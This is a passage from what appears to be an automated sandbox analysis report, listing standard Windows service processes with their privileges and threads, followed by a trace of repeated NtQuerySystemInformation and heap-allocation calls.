"C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000ec56" [0xc000000f], "LOCAL" [0x7] Thread: id = 380 os_tid = 0x13f4 Thread: id = 381 os_tid = 0x588 Thread: id = 382 os_tid = 0x584 Thread: id = 383 os_tid = 0x580 Thread: id = 384 os_tid = 0x57c Thread: id = 385 os_tid = 0x578 Thread: id = 386 os_tid = 0x574 Thread: id = 387 os_tid = 0x570 Thread: id = 388 os_tid = 0x558 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f8fa000" os_pid = "0x590" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-4071458001-3563271761-1846288968-3700919931-3809667977" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f41a" [0xc000000f], "LOCAL" [0x7] Thread: id = 389 os_tid = 0xcc0 Thread: id = 390 os_tid = 0xc30 Thread: id = 391 os_tid = 0x8e4 Thread: id = 392 os_tid = 0x8e0 Thread: id = 393 os_tid = 0x594 Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27b000" os_pid = "0x598" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Wcmsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f421" [0xc000000f], "LOCAL" [0x7] Thread: id = 394 os_tid = 0x68c Thread: id = 395 os_tid = 0x66c Thread: id = 396 os_tid = 0x624 Thread: id = 397 os_tid = 0x614 Thread: id = 398 os_tid = 0x60c Thread: id = 399 os_tid = 0x608 Thread: id = 400 os_tid = 0x604 Thread: id = 401 os_tid = 0x600 Thread: id = 402 os_tid = 0x5d4 Thread: id = 403 os_tid = 0x59c Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 404 os_tid = 0x9bc Thread: id = 405 os_tid = 0x7ec Thread: id = 406 os_tid = 0x770 Thread: id = 407 os_tid = 0x7d8 Thread: id = 408 os_tid = 0x698 Thread: id = 409 os_tid = 0x690 Thread: id = 410 os_tid = 0x5fc Thread: id = 411 os_tid = 0x5f8 Thread: id = 412 os_tid = 0x5f4 Thread: id = 413 os_tid = 0x5b4 Process: id = "23" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x4ac0c000" os_pid = "0x5e8" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\spoolsv.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001010e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 414 os_tid = 0x1070 Thread: id = 415 os_tid = 0x12a0 Thread: id = 416 os_tid = 0x129c Thread: id = 417 os_tid = 0x1298 Thread: id = 418 os_tid = 0x128c Thread: id = 419 os_tid = 0x1284 Thread: id = 420 os_tid = 0x1280 Thread: id = 421 os_tid = 0x1278 Thread: id = 422 os_tid = 0x1274 Thread: id = 423 os_tid = 0x634 Thread: id = 424 os_tid = 0x620 Thread: id = 425 os_tid = 0x618 Thread: id = 426 os_tid = 0x610 Thread: id = 427 os_tid = 0x5ec Process: id = "24" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f046000" os_pid = "0x69c" os_integrity_level = "0x4000" os_privileges = "0x860814080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k wsappx" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppXSvc" [0xe], "NT SERVICE\\ClipSVC" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001205b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 428 os_tid = 0x7d0 Thread: id = 429 os_tid = 0x6b4 Thread: id = 430 os_tid = 0x6b0 Thread: id = 431 os_tid = 0x6a8 Thread: id = 432 os_tid = 0x6a0 Thread: id = 497 os_tid = 0xf08 Thread: id = 498 os_tid = 0xfc8 Thread: id = 514 os_tid = 0x1044 Thread: id = 515 os_tid = 0x104c Thread: id = 555 os_tid = 0xa24 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4dab9000" os_pid = "0x720" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 433 os_tid = 0x1384 Thread: id = 434 os_tid = 0xcc4 Thread: id = 435 os_tid = 0x6d4 Thread: id = 436 os_tid = 0x74c Thread: id = 437 os_tid = 0x7dc Thread: id = 438 os_tid = 0x7b4 Thread: id = 439 os_tid = 0x76c Thread: id = 440 os_tid = 0x768 Thread: id = 441 os_tid = 0x754 Thread: id = 442 os_tid = 0x750 Thread: id = 443 os_tid = 0x748 Thread: id = 444 os_tid = 0x724 Process: id = "26" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x465e2000" os_pid = "0x818" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 445 os_tid = 0x1220 Thread: id = 446 os_tid = 0xf10 Thread: id = 447 os_tid = 0xe80 Thread: id = 448 os_tid = 0xe68 Thread: id = 449 os_tid = 0xb6c Thread: id = 450 os_tid = 0xa68 Thread: id = 451 os_tid = 0xa48 Thread: id = 452 os_tid = 0xa3c Thread: id = 453 os_tid = 0xa04 Thread: id = 454 os_tid = 0xa00 Thread: id = 455 os_tid = 0x9f4 Thread: id = 456 os_tid = 0x9f0 Thread: id = 457 os_tid = 0x9ec Thread: id = 458 os_tid = 0x9e4 Thread: id = 459 os_tid = 0x9c8 Thread: id = 460 os_tid = 0x858 Thread: id = 461 os_tid = 0x828 Thread: id = 462 os_tid = 0x81c Process: id = "27" image_name = "securityhealthservice.exe" filename = "c:\\windows\\system32\\securityhealthservice.exe" page_root = "0x4aae8000" os_pid = "0x84c" os_integrity_level = "0x4000" os_privileges = "0x20900080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\SecurityHealthService.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-259296475-4084429506-1152984619-38739575-565535606" [0xe], "NT AUTHORITY\\Logon Session 00000000:000180f8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 463 os_tid = 0x994 Thread: id = 464 os_tid = 0x990 Thread: id = 465 os_tid = 0x98c Thread: id = 466 os_tid = 0x8d4 Thread: id = 467 os_tid = 0x850 Process: id = "28" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6122d000" os_pid = "0x10a8" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:000551a3" [0xc000000f], "LOCAL" [0x7] Thread: id = 468 os_tid = 0x10fc Thread: id = 469 os_tid = 0x10f4 Thread: id = 470 os_tid = 0x10f0 Thread: id = 471 os_tid = 0x10e4 Thread: id = 472 os_tid = 0x10e0 Thread: id = 473 os_tid = 0x10dc Thread: id = 474 os_tid = 0x10b8 Thread: id = 475 os_tid = 0x10b0 Thread: id = 476 os_tid = 0x10ac Process: id = "29" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x185cd000" os_pid = "0x11c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\sppsvc.exe" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007fdc6" [0xc000000f], "LOCAL" [0x7] Thread: id = 477 os_tid = 0x53c [0271.505] GetProcessHeap () returned 0x27fc8db0000 [0271.505] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4ddf0 [0271.505] GetProcessHeap () returned 0x27fc8db0000 [0271.505] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7dcc0 [0271.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0271.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc70, Length=0x28, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0271.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdcf0, Length=0x28, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdcf0, Length=0x28, ResultLength=0x0) [0271.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x20, ResultLength=0x0) [0271.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc50, Length=0x20, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdbe0, Length=0x20, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdbe0, Length=0x20, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0271.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0271.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0271.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.610] NtQuerySystemInformation (SystemInformationClass=0xb9, 